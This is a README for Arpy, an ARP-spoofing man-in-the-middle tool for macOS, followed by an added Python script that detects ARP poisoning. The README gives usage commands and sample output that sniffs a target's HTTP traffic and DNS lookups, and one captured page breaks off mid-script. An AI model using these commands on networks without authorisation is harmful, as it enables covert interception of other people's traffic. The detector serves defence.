Arpy - Mac OSX ARP Spoof (MiTM) Tool

Arpy is an easy-to-use ARP spoofing MiTM tool for Mac.

It provides 3 targeted functions:

  • Packet sniffing
  • Visited domains
  • Visited domains with Gource

Requirements:

  • Python 2.7
  • Gource
  • Scapy
  • libdnet

    Installation:

    • Gource:
    brew install gource

    • Scapy:
    pip install scapy

    • libdnet:
    git clone https://github.com/dugsong/libdnet.git
    cd libdnet
    ./configure && make && make install
    cd python
    python setup.py install
    

    Usage:

    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
    
    ARP MiTM Tool
    
    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
    

    Packet Sniff:

    This is the packet sniffer; it lets you see your target's traffic.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    
      [Info] Starting Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*
    
    
    
    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS
    
    <html>
         <title>><></title>
        <body>
            <pre style="line-height: 1.25; white-space: pre;">
                      SORRY            /
                                      /
                  This page does     /
               ]   not exist yet.    [    ,'|
               ]                     [   /  |
               ]___               ___[ ,'   |
               ]  ]             /[  [ |:   |
               ]  ]            / [  [ |:   |
               ]  ]  ]         [  [  [ |:   |
               ]  ]  ]__     __[  [  [ |:   |
               ]  ]  ] ] _ /[ [  [  [ |:   |
               ]  ]  ] ] (#) [ [  [  [ :===='
               ]  ]  ]_].nHn.[_[  [  [
               ]  ]  ]  HHHHH. [  [  [
               ]  ] /   `HH("N   [  [
               ]__]/     HHH  "  [__[
               ]         NNN         [
               ]         N/"         [
               ]         N H         [
              /          N            
             /           q,            
            /                           
            </pre>
            <h3 id="list"><h3>
        </body>
    <script>
    
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||

    DNS Sniff:

    This function lets you see the domain names your target is currently requesting.

    ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
             - @viljoenivan
    
    
      [Info] Starting DNS Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

    DNS Sniff With Gource:

    This function is more or less the same as the one above; however, it provides the ability to pipe the output through Gource for a live feed of what your target is viewing.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
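
Seen from the target's side, the poisoning that arpy sets up between the `-t` host and the `-g` gateway shows up in the ARP cache as the gateway IP resolving to a different MAC. The following Python check is an added example (not part of arpy or the original page) that compares two macOS `arp -a` snapshots; the MAC addresses, the host 192.168.1.5 and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Line shape printed by macOS `arp -a`; "(incomplete)" entries do not match.
ARP_LINE = re.compile(r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>[0-9a-fA-F:]+) on ")

# Constructed snapshots (locally administered MACs, hypothetical host 192.168.1.5).
BASELINE = """\
? (192.168.1.1) at 2:0:0:aa:0:1 on en0 ifscope [ethernet]
? (192.168.1.5) at 2:0:0:bb:0:5 on en0 ifscope [ethernet]
? (192.168.1.7) at (incomplete) on en0 ifscope [ethernet]
"""
CURRENT = """\
? (192.168.1.1) at 2:0:0:bb:0:5 on en0 ifscope [ethernet]
? (192.168.1.5) at 2:0:0:bb:0:5 on en0 ifscope [ethernet]
? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
"""

def normalize_mac(mac):
    """macOS drops leading zeros in each octet (2:0:0:aa:0:1); pad them back."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))

def parse_arp_table(text):
    """Return {ip: normalized_mac} for every resolved entry in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m and m.group("mac").count(":") == 5:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table

def findings(baseline_text, current_text, gateway_ip):
    """Compare a trusted snapshot with a current one; return (kind, detail) tuples."""
    base, cur = parse_arp_table(baseline_text), parse_arp_table(current_text)
    out = []
    # Signal 1: the gateway IP now resolves to a MAC other than the trusted one.
    if gateway_ip in base and gateway_ip in cur and base[gateway_ip] != cur[gateway_ip]:
        out.append(("gateway_mac_changed", (gateway_ip, base[gateway_ip], cur[gateway_ip])))
    # Signal 2: one unicast MAC answers for several IPs (broadcast/multicast skipped).
    by_mac = defaultdict(list)
    for ip, mac in cur.items():
        if not int(mac[:2], 16) & 1:  # low bit of first octet set = group address
            by_mac[mac].append(ip)
    out += [("mac_shared_by_ips", (m, sorted(i))) for m, i in by_mac.items() if len(i) > 1]
    return out

if __name__ == "__main__":
    print(findings(BASELINE, CURRENT, "192.168.1.1"))
```

A MAC shared by several IPs can also be a router with multiple addresses or proxy ARP, so treat the second finding as a lead to check against the baseline rather than as proof.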
    
